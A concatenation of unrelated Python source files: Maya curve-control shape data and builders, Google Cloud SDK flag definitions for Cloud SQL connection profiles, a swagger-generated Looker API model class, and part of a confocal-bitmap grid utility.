        (-1.2, 0.0, -0.4), (-1.2, 0.0, -0.6), (-1.2, 0.0, -0.8), (-1.4, 0.0, -0.6),
        (-1.6, 0.0, -0.4), (-1.8, 0.0, -0.2), (-2.0, 0.0, 0.0), (-1.8, 0.0, 0.2), (-1.6, 0.0, 0.4),
        (-1.4, 0.0, 0.6), (-1.2, 0.0, 0.8), (-1.2, 0.0, 0.4), (-1.0, 0.0, 0.4), (-0.8, 0.0, 0.4),
        (-0.6, 0.0, 0.4), (-0.4, 0.0, 0.4), (-0.4, 0.0, 0.6), (-0.4, 0.0, 0.8), (-0.4, 0.0, 1.0),
        (-0.4, 0.0, 1.2), (-0.8, 0.0, 1.2), (-0.6, 0.0, 1.4), (-0.4, 0.0, 1.6), (-0.2, 0.0, 1.8),
        (0.0, 0.0, 2.0), (0.2, 0.0, 1.8), (0.4, 0.0, 1.6), (0.6, 0.0, 1.4), (0.8, 0.0, 1.2),
        (0.4, 0.0, 1.2), (0.4, 0.0, 1.0), (0.4, 0.0, 0.8), (0.4, 0.0, 0.6), (0.4, 0.0, 0.4),
        (0.6, 0.0, 0.4), (0.8, 0.0, 0.4), (1.0, 0.0, 0.4), (1.2, 0.0, 0.4), (1.2, 0.0, 0.8),
        (1.4, 0.0, 0.6), (1.6, 0.0, 0.4), (1.8, 0.0, 0.2), (2.0, 0.0, 0.0), (1.8, 0.0, -0.2),
        (1.6, 0.0, -0.4), (1.4, 0.0, -0.6), (1.2, 0.0, -0.8), (1.2, 0.0, -0.6), (1.2, 0.0, -0.4),
        (1.0, 0.0, -0.4), (0.8, 0.0, -0.4), (0.6, 0.0, -0.4)],
    # Same outline as 'quad_arrow' but with varying Y values.
    'master_move': [
        (0.4, -0.1, -0.4), (0.4, -0.1, -0.6), (0.4, 0.0, -0.8), (0.4, 0.1, -1.0), (0.4, 0.1, -1.2),
        (0.8, 0.1, -1.2), (0.6, 0.1, -1.4), (0.4, 0.1, -1.6), (0.2, 0.1, -1.8), (0, 0.1, -2.0),
        (-0.2, 0.1, -1.8), (-0.4, 0.1, -1.6), (-0.6, 0.1, -1.4), (-0.8, 0.1, -1.2),
        (-0.4, 0.1, -1.2), (-0.4, 0.1, -1.0), (-0.4, 0.0, -0.8), (-0.4, -0.1, -0.6),
        (-0.4, -0.1, -0.4), (-0.6, -0.1, -0.4), (-0.8, 0.0, -0.4), (-1.0, 0.1, -0.4),
        (-1.2, 0.1, -0.4), (-1.2, 0.1, -0.6), (-1.2, 0.1, -0.8), (-1.4, 0.1, -0.6),
        (-1.6, 0.1, -0.4), (-1.8, 0.1, -0.2), (-2.0, 0.1, 0), (-1.8, 0.1, 0.2), (-1.6, 0.1, 0.4),
        (-1.4, 0.1, 0.6), (-1.2, 0.1, 0.8), (-1.2, 0.1, 0.4), (-1.0, 0.1, 0.4), (-0.8, 0.0, 0.4),
        (-0.6, -0.1, 0.4), (-0.4, -0.1, 0.4), (-0.4, -0.1, 0.6), (-0.4, 0.0, 0.8), (-0.4, 0.1, 1.0),
        (-0.4, 0.1, 1.2), (-0.8, 0.1, 1.2), (-0.6, 0.1, 1.4), (-0.4, 0.1, 1.6), (-0.2, 0.1, 1.8),
        (0, 0.1, 2.0), (0.2, 0.1, 1.8), (0.4, 0.1, 1.6), (0.6, 0.1, 1.4), (0.8, 0.1, 1.2),
        (0.4, 0.1, 1.2), (0.4, 0.1, 1.0), (0.4, 0.0, 0.8), (0.4, -0.1, 0.6), (0.4, -0.1, 0.4),
        (0.6, -0.1, 0.4), (0.8, 0.0, 0.4), (1.0, 0.1, 0.4), (1.2, 0.1, 0.4), (1.2, 0.1, 0.8),
        (1.4, 0.1, 0.6), (1.6, 0.1, 0.4), (1.8, 0.1, 0.2), (2.0, 0.1, 0), (1.8, 0.1, -0.2),
        (1.6, 0.1, -0.4), (1.4, 0.1, -0.6), (1.2, 0.1, -0.8), (1.2, 0.1, -0.6), (1.2, 0.1, -0.4),
        (1.0, 0.1, -0.4), (0.8, 0.0, -0.4), (0.6, -0.1, -0.4)],
    'arrow': [
        (0, 0, 0), (2, 0, 2), (1, 0, 2), (1, 0, 3), (1, 0, 4), (1, 0, 5), (1, 0, 6), (1, 0, 7),
        (1, 0, 8), (0, 0, 8), (-1, 0, 8), (-1, 0, 7), (-1, 0, 6), (-1, 0, 5), (-1, 0, 4),
        (-1, 0, 3), (-1, 0, 2), (-2, 0, 2)],
    'plus': [
        (-1, 0, -1), (-1, 0, -3), (1, 0, -3), (1, 0, -1), (3, 0, -1), (3, 0, 1), (1, 0, 1),
        (1, 0, 3), (-1, 0, 3), (-1, 0, 1), (-3, 0, 1), (-3, 0, -1)],
    'ring': [
        (0.707107, 0.1, 0.707107), (1, 0.1, 0), (1, -0.1, 0), (0.707107, -0.1, -0.707107),
        (0.707107, 0.1, -0.707107), (0, 0.1, -1), (0, -0.1, -1), (-0.707107, -0.1, -0.707107),
        (-0.707107, 0.1, -0.707107), (-1, 0.1, 0), (-1, -0.1, 0), (-0.707107, -0.1, 0.707107),
        (-0.707107, 0.1, 0.707107), (0, 0.1, 1), (0, -0.1, 1), (0.707107, -0.1, 0.707107),
        (0.707107, 0.1, 0.707107), (0, 0.1, 1), (0, -0.1, 1), (-0.707107, -0.1, 0.707107),
        (-0.707107, 0.1, 0.707107), (-1, 0.1, 0), (-1, -0.1, 0), (-0.707107, -0.1, -0.707107),
        (-0.707107, 0.1, -0.707107), (0, 0.1, -1), (0, -0.1, -1), (0.707107, -0.1, -0.707107),
        (0.707107, 0.1, -0.707107), (1, 0.1, 0), (1, -0.1, 0), (0.707107, -0.1, 0.707107)],
    'double_arrow': [
        (1, 0, 0), (1, 0, -1), (1, 0, -2), (1, 0, -3), (2, 0, -3), (1, 0, -4), (0, 0, -5),
        (-1, 0, -4), (-2, 0, -3), (-1, 0, -3), (-1, 0, -2), (-1, 0, -1), (-1, 0, 0), (-1, 0, 1),
        (-1, 0, 2), (-1, 0, 3), (-2, 0, 3), (-1, 0, 4), (0, 0, 5), (1, 0, 4), (2, 0, 3), (1, 0, 3),
        (1, 0, 2), (1, 0, 1)],
    'half_circle': [
        (0, 0, -1), (-0.10447515585510377, 0, -1), (-0.3132852867940712, 0, -0.9635267637659666),
        (-0.5943487937195443, 0, -0.8183627562953246),
        (-0.8231292854416953, 0, -0.5980921804260191),
        (-0.9658174718568318, 0, -0.3136661981440106), (-1, 0, 0),
        (-0.9658174718568332, 0, 0.3136661981440098), (-0.8231292854416946, 0, 0.598092180426019),
        (-0.5943487937195449, 0, 0.8183627562953251), (-0.31328528679407086, 0, 0.9635267637659651),
        (-0.10447515585510486, 0, 1), (0, 0, 1)],
    'tesseract': [
        (0.866025, 0.866025, 0.866025), (-0.866025, 0.866025, 0.866025), (-0.5, 0.5, 0.5),
        (0.5, 0.5, 0.5), (0.866025, 0.866025, 0.866025), (0.866025, -0.866025, 0.866025),
        (0.5, -0.5, 0.5), (0.5, 0.5, 0.5), (0.5, 0.5, -0.5), (0.866025, 0.866025, -0.866025),
        (0.866025, 0.866025, 0.866025), (0.866025, -0.866025, 0.866025),
        (0.866025, -0.866025, -0.866025), (0.866025, 0.866025, -0.866025), (0.5, 0.5, -0.5),
        (0.5, -0.5, -0.5), (0.866025, -0.866025, -0.866025), (-0.866025, -0.866025, -0.866025),
        (-0.866025, 0.866025, -0.866025), (-0.5, 0.5, -0.5), (-0.5, -0.5, -0.5),
        (-0.866025, -0.866025, -0.866025), (-0.866025, -0.866025, 0.866025),
        (-0.866025, 0.866025, 0.866025), (-0.5, 0.5, 0.5), (-0.5, -0.5, 0.5),
        (-0.866025, -0.866025, 0.866025), (0.866025, -0.866025, 0.866025), (0.5, -0.5, 0.5),
        (0.5, -0.5, -0.5), (-0.5, -0.5, -0.5), (-0.5, -0.5, 0.5), (0.5, -0.5, 0.5), (0.5, 0.5, 0.5),
        (-0.5, 0.5, 0.5), (-0.5, 0.5, -0.5), (0.5, 0.5, -0.5), (0.866025, 0.866025, -0.866025),
        (-0.866025, 0.866025, -0.866025), (-0.866025, 0.866025, 0.866025)]
}
# Color name -> normalized [R, G, B] components in the 0-1 range.
# NOTE(review): 'purple' duplicates the 'magenta' value — confirm intended.
RGB_DICTIONARY = {
    'red': [1, 0, 0],
    'pink': [1, .5, .5],
    'orange': [1, .4, 0],
    'yellow': [1, 1, 0],
    'green': [0, 1, 0],
    'cyan': [0, 1, 1],
    'blue': [0, 0, 1],
    'magenta': [1, 0, 1],
    'purple': [1, 0, 1],
    'white': [1, 1, 1],
    'grey': [.6, .6, .6]
}
# Index colors are blown out by comparison, so these values are more correct
# NOTE(review): unlike the other entries, 'grey' here is a plain 0-1 RGB
# triple, and 'purple' again duplicates 'magenta' — confirm both are intended.
RGB_ACTUALS = {
    'red': [8.509607315063477, -0.010916219092905521, -0.010916219092905521],
    'pink': [8.509607315063477, 0.5029946565628052, 0.5029946565628052],
    'orange': [1.270400047302246, 0.33289995789527893, -0.010800041258335114],
    'yellow': [8.509607315063477, 8.509607315063477, -0.010916219092905521],
    'green': [-0.010916219092905521, 8.509607315063477, -0.010916219092905521],
    'cyan': [0.14030349254608154, 1.1826233863830566, 8.509607315063477],
    'blue': [-0.010916219092905521, -0.010916219092905521, 8.509607315063477],
    'magenta': [0.770842432975769, -0.010916443541646004, 0.770842432975769],
    'purple': [0.770842432975769, -0.010916443541646004, 0.770842432975769],
    'white': [8.509607315063477, 8.509607315063477, 8.509607315063477],
    'grey': [.9, .9, .9]
}
# Curve name -> bool flag consumed by the curve-creation code.
# NOTE(review): the meaning of the flag is not evident from this file
# (presumably whether the curve is built from CURVE_POINTS as a linear
# curve vs. created by a dedicated builder) — confirm against the caller.
CURVE_LIBRARY_BOOL = {
    'circle': False,
    'square': True,
    'triangle': True,
    'octagon': False,
    'box': False,
    'sphere': False,
    'pyramid': False,  # might be True
    'diamond': False,  # might be True
    'quad_arrow': True,
    'arrow': True,
    'plus': True,
    'ring': True,
    'double_arrow': True,
    'half_circle': False,
    'tesseract': False,
    'rounded_square': False,
    'master_move': True,
}
def control_sphere(*arg):
    """Build a sphere-like control from three axis-aligned NURBS circles.

    Three circles (normal Y, X and Z) are created; the shapes of the last
    two are re-parented under the first transform and their now-empty
    transforms deleted. The combined transform is selected and returned.
    """
    normals = ([0, 1, 0], [1, 0, 0], [0, 0, 1])
    keeper, extra_a, extra_b = [cmds.circle(nr=n, r=1, d=3, ch=0)[0] for n in normals]
    cmds.parent(
        cmds.listRelatives(extra_a, extra_b, shapes=True),
        keeper,
        shape=True,
        relative=True)
    cmds.delete(extra_a, extra_b)
    cmds.select(keeper)
    return keeper
def rounded_square(*arg):
    """Create a 16-section circle and pin its CVs into a rounded square.

    Returns the transform name of the resulting curve.
    """
    shape = cmds.circle(
        normal=[0, 1, 0],
        radius=1,
        degree=3,
        sections=16,
        constructionHistory=False)[0]
    # Target CV positions forming the rounded-square outline.
    target_points = [
        (0, 0, -1.0), (-0.4, 0, -1.0), (-1.0, 0.0, -1.0), (-1.0, 0, -0.4), (-1.0, 0, 0),
        (-1.0, 0, 0.4), (-1.0, 0.0, 1.0), (-0.4, 0, 1.0), (0, 0, 1.0), (0.4, 0, 1.0),
        (1.0, 0.0, 1.0), (1.0, 0, 0.4), (1.0, 0, 0), (1.0, 0, -0.4), (1.0, 0, -1.0), (0.4, 0, -1.0)]
    for index, point in enumerate(target_points):
        cmds.setAttr('{}.cv[{}]'.format(shape, index), *point)
    return shape
|
<filename>lib/googlecloudsdk/command_lib/database_migration/connection_profiles/cloudsql_flags.py
# -*- coding: utf-8 -*- #
# Copyright 2020 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Flags and helpers for the connection profiles cloudsql related commands."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from googlecloudsdk.calliope import arg_parsers
# Building blocks for validating values passed to --authorized-networks.
_IP_ADDRESS_PART = r'(25[0-5]|2[0-4][0-9]|1?[0-9]{1,2})'  # Match decimal 0-255
_CIDR_PREFIX_PART = r'([0-9]|[1-2][0-9]|3[0-2])'  # Match decimal 0-32
# Matches either IPv4 range in CIDR notation or a naked IPv4 address.
_CIDR_REGEX = r'{addr_part}(\.{addr_part}){{3}}(\/{prefix_part})?$'.format(
    addr_part=_IP_ADDRESS_PART, prefix_part=_CIDR_PREFIX_PART)
def AddDatabaseVersionFlag(parser):
  """Adds a --database-version flag to the given parser."""
  supported_versions = [
      'MYSQL_5_7', 'MYSQL_5_6', 'MYSQL_8_0', 'POSTGRES_9_6', 'POSTGRES_10',
      'POSTGRES_11', 'POSTGRES_12', 'POSTGRES_13'
  ]
  version_help = """\
  Database engine type and version (MYSQL_5_7, MYSQL_5_6, MYSQL_8_0,
  POSTGRES_9_6, POSTGRES_10, POSTGRES_11, POSTGRES_12, POSTGRES_13).
  """
  parser.add_argument(
      '--database-version',
      required=True,
      choices=supported_versions,
      help=version_help)
def AddUserLabelsFlag(parser):
  """Adds a --user-labels flag to the given parser."""
  labels_help = """\
  The resource labels for a Cloud SQL instance to use to annotate any related
  underlying resources such as Compute Engine VMs. An object containing a list
  of "key": "value" pairs.
  """
  parser.add_argument(
      '--user-labels',
      type=arg_parsers.ArgDict(),
      metavar='KEY=VALUE',
      help=labels_help)
def AddTierFlag(parser):
  """Adds a --tier flag to the given parser.

  BUGFIX: the help text read "(MySQL instances) of ``db-custom-1-3840''";
  the conjunction should be "or".
  """
  help_text = """\
  Tier (or machine type) for this instance, for example: ``db-n1-standard-1''
  (MySQL instances) or ``db-custom-1-3840'' (PostgreSQL instances). For more
  information, see
  [Cloud SQL Instance Settings](https://cloud.google.com/sql/docs/mysql/instance-settings).
  """
  parser.add_argument('--tier', help=help_text, required=True)
def AddStorageAutoResizeLimitFlag(parser):
  """Adds a --storage-auto-resize-limit flag to the given parser."""
  limit_help = """\
  Maximum size to which storage capacity can be automatically increased. The
  default value is 0, which specifies that there is no limit.
  """
  parser.add_argument(
      '--storage-auto-resize-limit', type=int, help=limit_help)
def AddActivationPolicylag(parser):
  """Adds a --activation-policy flag to the given parser.

  NOTE(review): the function name is missing an 'F' (should presumably be
  AddActivationPolicyFlag); kept as-is since callers reference this name.
  """
  policy_help = """\
  Activation policy specifies when the instance is activated; it is
  applicable only when the instance state is 'RUNNABLE'. Valid values:
  ALWAYS: The instance is on, and remains so even in the absence of
  connection requests.
  NEVER: The instance is off; it is not activated, even if a connection
  request arrives.
  """
  parser.add_argument(
      '--activation-policy', choices=['ALWAYS', 'NEVER'], help=policy_help)
def AddEnableIpv4Flag(parser):
  """Adds a --enable-ip-v4 flag to the given parser."""
  help_text = 'Whether the instance should be assigned an IPv4 address or not.'
  # BUGFIX: argparse's type=bool returns True for ANY non-empty string,
  # including 'false'; ArgBoolean parses 'true'/'false' values correctly.
  parser.add_argument(
      '--enable-ip-v4', type=arg_parsers.ArgBoolean(), help=help_text)
def AddPrivateNetworkFlag(parser):
  """Adds a --private-network flag to the given parser."""
  network_help = """\
  Resource link for the VPC network from which the Cloud SQL instance is
  accessible for private IP. For example,
  /projects/myProject/global/networks/default. This setting can be updated,
  but it cannot be removed after it is set.
  """
  parser.add_argument('--private-network', help=network_help)
def AddRequireSslFlag(parser):
  """Adds a --require-ssl flag to the given parser."""
  help_text = 'Whether SSL connections over IP should be enforced or not.'
  # BUGFIX: argparse's type=bool returns True for ANY non-empty string,
  # including 'false'; ArgBoolean parses 'true'/'false' values correctly.
  parser.add_argument(
      '--require-ssl', type=arg_parsers.ArgBoolean(), help=help_text)
def AddAuthorizedNetworksFlag(parser):
  """Adds a `--authorized-networks` flag."""
  # Each list element must be a valid IPv4 address or CIDR range.
  network_validator = arg_parsers.RegexpValidator(
      _CIDR_REGEX, ('Must be specified in CIDR notation, also known as '
                    '\'slash\' notation (e.g. 192.168.100.0/24).'))
  networks_help = """\
  List of external networks that are allowed to connect to the instance using
  the IP. See https://en.wikipedia.org/wiki/CIDR_notation#CIDR_notation, also
  known as 'slash' notation (e.g.192.168.100.0/24).
  """
  parser.add_argument(
      '--authorized-networks',
      metavar='NETWORK',
      default=[],
      type=arg_parsers.ArgList(min_length=1, element_type=network_validator),
      help=networks_help)
def AddAutoStorageIncreaseFlag(parser):
  """Adds a --auto-storage-increase flag to the given parser."""
  help_text = """\
  If you enable this setting, Cloud SQL checks your available storage every
  30 seconds. If the available storage falls below a threshold size, Cloud
  SQL automatically adds additional storage capacity. If the available
  storage repeatedly falls below the threshold size, Cloud SQL continues to
  add storage until it reaches the maximum of 30 TB. Default: ON.
  """
  # BUGFIX: argparse's type=bool returns True for ANY non-empty string,
  # including 'false'; ArgBoolean parses 'true'/'false' values correctly.
  parser.add_argument(
      '--auto-storage-increase', type=arg_parsers.ArgBoolean(), help=help_text)
def AddDatabaseFlagsFlag(parser):
  """Adds a --database-flags flag to the given parser."""
  flags_help = """\
  Database flags passed to the Cloud SQL instance at startup. An object
  containing a list of "key": value pairs. Example: { "name": "wrench",
  "mass": "1.3kg", "count": "3" }.
  """
  parser.add_argument(
      '--database-flags',
      metavar='KEY=VALUE',
      type=arg_parsers.ArgDict(),
      help=flags_help)
def AddDataDiskTypeFlag(parser):
  """Adds a --data-disk-type flag to the given parser."""
  parser.add_argument(
      '--data-disk-type',
      choices=['PD_SSD', 'PD_HDD'],
      help='Type of storage: PD_SSD (default) or PD_HDD.')
def AddDataDiskSizeFlag(parser):
  """Adds a --data-disk-size flag to the given parser."""
  size_help = """\
  Storage capacity available to the database, in GB. The minimum (and
  default) size is 10GB.
  """
  parser.add_argument('--data-disk-size', type=int, help=size_help)
def AddZoneFlag(parser):
  """Adds a --zone flag to the given parser.

  BUGFIX: the help text misspelled "database" as "datdabse".
  """
  help_text = """\
  Google Cloud Platform zone where your Cloud SQL database instance is
  located.
  """
  parser.add_argument('--zone', help=help_text)
|
# coding: utf-8
"""
Experimental Looker API 3.1 Preview
This API 3.1 is in active development. Breaking changes are likely to occur to some API functions in future Looker releases until API 3.1 is officially launched and upgraded to beta status. If you have time and interest to experiment with new or modified services exposed in this embryonic API 3.1, we welcome your participation and feedback! For large development efforts or critical line-of-business projects, we strongly recommend you stick with the API 3.0 while API 3.1 is under construction. # noqa: E501
OpenAPI spec version: 3.1.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class UserAttributeWithValue(object):
    """NOTE: This class is auto generated by the swagger code generator program.
    Do not edit the class manually.
    """
    """
    Attributes:
      swagger_types (dict): The key is attribute name
                            and the value is attribute type.
      attribute_map (dict): The key is attribute name
                            and the value is json key in definition.
    """
    # Attribute name -> swagger type string (used by to_dict()).
    swagger_types = {
        'name': 'str',
        'label': 'str',
        'rank': 'int',
        'value': 'str',
        'user_id': 'int',
        'user_can_edit': 'bool',
        'value_is_hidden': 'bool',
        'user_attribute_id': 'int',
        'source': 'str',
        'can': 'dict(str, bool)'
    }

    # Attribute name -> JSON key in the API definition.
    attribute_map = {
        'name': 'name',
        'label': 'label',
        'rank': 'rank',
        'value': 'value',
        'user_id': 'user_id',
        'user_can_edit': 'user_can_edit',
        'value_is_hidden': 'value_is_hidden',
        'user_attribute_id': 'user_attribute_id',
        'source': 'source',
        'can': 'can'
    }

    def __init__(self, name=None, label=None, rank=None, value=None, user_id=None, user_can_edit=None, value_is_hidden=None, user_attribute_id=None, source=None, can=None):  # noqa: E501
        """UserAttributeWithValue - a model defined in Swagger"""  # noqa: E501
        # All backing fields start as None; setters below only run for
        # keyword arguments that were actually supplied.
        self._name = None
        self._label = None
        self._rank = None
        self._value = None
        self._user_id = None
        self._user_can_edit = None
        self._value_is_hidden = None
        self._user_attribute_id = None
        self._source = None
        self._can = None
        self.discriminator = None
        if name is not None:
            self.name = name
        if label is not None:
            self.label = label
        if rank is not None:
            self.rank = rank
        if value is not None:
            self.value = value
        if user_id is not None:
            self.user_id = user_id
        if user_can_edit is not None:
            self.user_can_edit = user_can_edit
        if value_is_hidden is not None:
            self.value_is_hidden = value_is_hidden
        if user_attribute_id is not None:
            self.user_attribute_id = user_attribute_id
        if source is not None:
            self.source = source
        if can is not None:
            self.can = can

    @property
    def name(self):
        """Gets the name of this UserAttributeWithValue.  # noqa: E501

        Name of user attribute  # noqa: E501

        :return: The name of this UserAttributeWithValue.  # noqa: E501
        :rtype: str
        """
        return self._name

    @name.setter
    def name(self, name):
        """Sets the name of this UserAttributeWithValue.

        Name of user attribute  # noqa: E501

        :param name: The name of this UserAttributeWithValue.  # noqa: E501
        :type: str
        """
        self._name = name

    @property
    def label(self):
        """Gets the label of this UserAttributeWithValue.  # noqa: E501

        Human-friendly label for user attribute  # noqa: E501

        :return: The label of this UserAttributeWithValue.  # noqa: E501
        :rtype: str
        """
        return self._label

    @label.setter
    def label(self, label):
        """Sets the label of this UserAttributeWithValue.

        Human-friendly label for user attribute  # noqa: E501

        :param label: The label of this UserAttributeWithValue.  # noqa: E501
        :type: str
        """
        self._label = label

    @property
    def rank(self):
        """Gets the rank of this UserAttributeWithValue.  # noqa: E501

        Precedence for setting value on user (lowest wins)  # noqa: E501

        :return: The rank of this UserAttributeWithValue.  # noqa: E501
        :rtype: int
        """
        return self._rank

    @rank.setter
    def rank(self, rank):
        """Sets the rank of this UserAttributeWithValue.

        Precedence for setting value on user (lowest wins)  # noqa: E501

        :param rank: The rank of this UserAttributeWithValue.  # noqa: E501
        :type: int
        """
        self._rank = rank

    @property
    def value(self):
        """Gets the value of this UserAttributeWithValue.  # noqa: E501

        Value of attribute for user  # noqa: E501

        :return: The value of this UserAttributeWithValue.  # noqa: E501
        :rtype: str
        """
        return self._value

    @value.setter
    def value(self, value):
        """Sets the value of this UserAttributeWithValue.

        Value of attribute for user  # noqa: E501

        :param value: The value of this UserAttributeWithValue.  # noqa: E501
        :type: str
        """
        self._value = value

    @property
    def user_id(self):
        """Gets the user_id of this UserAttributeWithValue.  # noqa: E501

        Id of User  # noqa: E501

        :return: The user_id of this UserAttributeWithValue.  # noqa: E501
        :rtype: int
        """
        return self._user_id

    @user_id.setter
    def user_id(self, user_id):
        """Sets the user_id of this UserAttributeWithValue.

        Id of User  # noqa: E501

        :param user_id: The user_id of this UserAttributeWithValue.  # noqa: E501
        :type: int
        """
        self._user_id = user_id

    @property
    def user_can_edit(self):
        """Gets the user_can_edit of this UserAttributeWithValue.  # noqa: E501

        Can the user set this value  # noqa: E501

        :return: The user_can_edit of this UserAttributeWithValue.  # noqa: E501
        :rtype: bool
        """
        return self._user_can_edit

    @user_can_edit.setter
    def user_can_edit(self, user_can_edit):
        """Sets the user_can_edit of this UserAttributeWithValue.

        Can the user set this value  # noqa: E501

        :param user_can_edit: The user_can_edit of this UserAttributeWithValue.  # noqa: E501
        :type: bool
        """
        self._user_can_edit = user_can_edit

    @property
    def value_is_hidden(self):
        """Gets the value_is_hidden of this UserAttributeWithValue.  # noqa: E501

        If true, the \"value\" field will be null, because the attribute settings block access to this value  # noqa: E501

        :return: The value_is_hidden of this UserAttributeWithValue.  # noqa: E501
        :rtype: bool
        """
        return self._value_is_hidden

    @value_is_hidden.setter
    def value_is_hidden(self, value_is_hidden):
        """Sets the value_is_hidden of this UserAttributeWithValue.

        If true, the \"value\" field will be null, because the attribute settings block access to this value  # noqa: E501

        :param value_is_hidden: The value_is_hidden of this UserAttributeWithValue.  # noqa: E501
        :type: bool
        """
        self._value_is_hidden = value_is_hidden

    @property
    def user_attribute_id(self):
        """Gets the user_attribute_id of this UserAttributeWithValue.  # noqa: E501

        Id of User Attribute  # noqa: E501

        :return: The user_attribute_id of this UserAttributeWithValue.  # noqa: E501
        :rtype: int
        """
        return self._user_attribute_id

    @user_attribute_id.setter
    def user_attribute_id(self, user_attribute_id):
        """Sets the user_attribute_id of this UserAttributeWithValue.

        Id of User Attribute  # noqa: E501

        :param user_attribute_id: The user_attribute_id of this UserAttributeWithValue.  # noqa: E501
        :type: int
        """
        self._user_attribute_id = user_attribute_id

    @property
    def source(self):
        """Gets the source of this UserAttributeWithValue.  # noqa: E501

        How user got this value for this attribute  # noqa: E501

        :return: The source of this UserAttributeWithValue.  # noqa: E501
        :rtype: str
        """
        return self._source

    @source.setter
    def source(self, source):
        """Sets the source of this UserAttributeWithValue.

        How user got this value for this attribute  # noqa: E501

        :param source: The source of this UserAttributeWithValue.  # noqa: E501
        :type: str
        """
        self._source = source

    @property
    def can(self):
        """Gets the can of this UserAttributeWithValue.  # noqa: E501

        Operations the current user is able to perform on this object  # noqa: E501

        :return: The can of this UserAttributeWithValue.  # noqa: E501
        :rtype: dict(str, bool)
        """
        return self._can

    @can.setter
    def can(self, can):
        """Sets the can of this UserAttributeWithValue.

        Operations the current user is able to perform on this object  # noqa: E501

        :param can: The can of this UserAttributeWithValue.  # noqa: E501
        :type: dict(str, bool)
        """
        self._can = can

    def to_dict(self):
        """Returns the model properties as a dict"""
        result = {}

        # Recursively convert nested models (anything with to_dict), lists
        # and dicts of models into plain Python structures.
        for attr, _ in six.iteritems(self.swagger_types):
            value = getattr(self, attr)
            if isinstance(value, list):
                result[attr] = list(map(
                    lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
                    value
                ))
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                result[attr] = dict(map(
                    lambda item: (item[0], item[1].to_dict())
                    if hasattr(item[1], "to_dict") else item,
                    value.items()
                ))
            else:
                result[attr] = value

        return result

    def to_str(self):
        """Returns the string representation of the model"""
        return pprint.pformat(self.to_dict())

    def __repr__(self):
        """For `print` and `pprint`"""
        return self.to_str()

    def __eq__(self, other):
        """Returns true if both objects are equal"""
        # NOTE(review): defining __eq__ without __hash__ makes instances
        # unhashable in Python 3 — presumably fine for generated models;
        # confirm no caller puts these in sets/dict keys.
        if not isinstance(other, UserAttributeWithValue):
            return False

        return self.__dict__ == other.__dict__

    def __ne__(self, other):
        """Returns true if both objects are not equal"""
        return not self == other
|
<gh_stars>10-100
from PIL import Image, ImageDraw, ImageStat
# Tile states: v = void, m = metal, u = unknown.
states = 'vmu'
# State char -> PIL named fill color (used when rendering bitmaps).
bitmap2fill = {
    'v':'white',
    'm':'blue',
    'u':'orange',
}
# Same mapping as RGBA tuples.
bitmap2fill2 = {
    'v': (255, 255, 255, 255),
    'm': (0, 0, 255, 255),
    'u': (255, 165, 0, 255),
}
# Inverse mapping: RGB pixel -> state char (for reading bitmaps back in).
fill2bitmap = {
    (255, 255, 255):'v', # white
    (0, 0, 255): 'm', # blue
    (255, 165, 0): 'u', # orange
}
# confocal bitmap
class CFB:
    """Grid model of a confocal bitmap.

    Maps between tile (col, row) coordinates and pixel (x, y) coordinates
    on the original image via per-axis linear equations ``pixel = m * tile + b``.
    NOTE: Python 2 module (``xrange``).
    """
    def __init__(self):
        # 0: cols, 1: rows
        self.crs = [None, None]
        # linear grid equations on the original image
        # xy_mb[axis] = (m, b) so that pixel = m * tile_index + b
        self.xy_mb = [None, None]
        # dict keyed by (col, row) -> state char ('v'/'m'/'u'), filled by callers
        self.bitmap = None

    def cr(self, adj=0):
        # Yield every (col, row) pair; adj widens/shrinks both ranges.
        for c in xrange(self.crs[0] + adj):
            for r in xrange(self.crs[1] + adj):
                yield (c, r)

    def xy(self, adj=0):
        '''Generate (x0, y0) upper left and (x1, y1) lower right (inclusive) tile coordinates'''
        for c in xrange(self.crs[0] + adj):
            (xm, xb) = self.xy_mb[0]
            x = int(xm * c + xb)
            for r in xrange(self.crs[1] + adj):
                (ym, yb) = self.xy_mb[1]
                y = int(ym * r + yb)
                # Lower-right corner is one full tile pitch away.
                yield (x, y), (x + xm, y + ym)

    def xy_cr(self, b=True, adj=0, sf=1.0):
        # Like xy() but also yields the (col, row); b=False drops the grid
        # intercepts (tiles start at the origin), sf scales all pixel coords.
        for c in xrange(self.crs[0] + adj):
            (xm, xb) = self.xy_mb[0]
            if not b:
                xb = 0.0
            x = int(xm * c + xb)
            for r in xrange(self.crs[1] + adj):
                (ym, yb) = self.xy_mb[1]
                if not b:
                    yb = 0.0
                y = int(ym * r + yb)
                yield ((int(x * sf), int(y * sf)), (int(int(x + xm) * sf), int(int(y + ym) * sf))), (c, r)

    def xy2cr(self, x, y, sf = 1.0):
        # Inverse mapping: pixel (x, y) -> tile (col, row).
        x = x / sf
        y = y / sf
        m, b = self.xy_mb[0]
        c = int((x - b) / m)
        m, b = self.xy_mb[1]
        r = int((y - b) / m)
        # NOTE(review): bounds use > rather than >= — inconsistent with
        # cfb_verify() below, which rejects c == crs[0]; confirm intent.
        if c > self.crs[0]:
            raise ValueError("max col %d, got %d => %d" % (self.crs[0], x, c))
        if r > self.crs[1]:
            raise ValueError("max row %d, got %d => %d" % (self.crs[1], y, r))
        return (c, r)
# Save in enlarged form
# Colors are made to be easy to see
# and may contain annotations
# Not intended to be read back
def cfb_save_debug(cfb, fn):
    """Render cfb at full image scale with debug colors and save to file fn."""
    #im = self.preproc_im.copy()
    # Canvas size = tile counts times per-tile pixel pitch (grid slope).
    im = Image.new("RGB", (int(cfb.crs[0] * cfb.xy_mb[0][0]), int(cfb.crs[1] * cfb.xy_mb[1][0])), "white")
    draw = ImageDraw.Draw(im)
    # b=False: drop the grid intercepts so the rendering starts at the origin.
    for ((x0, y0), (x1, y1)), (c, r) in cfb.xy_cr(False):
        draw.rectangle((x0, y0, x1, y1), fill=bitmap2fill[cfb.bitmap[(c, r)]])
    im.save(fn)
# Save in minimal interchange format with one pixel per lambda
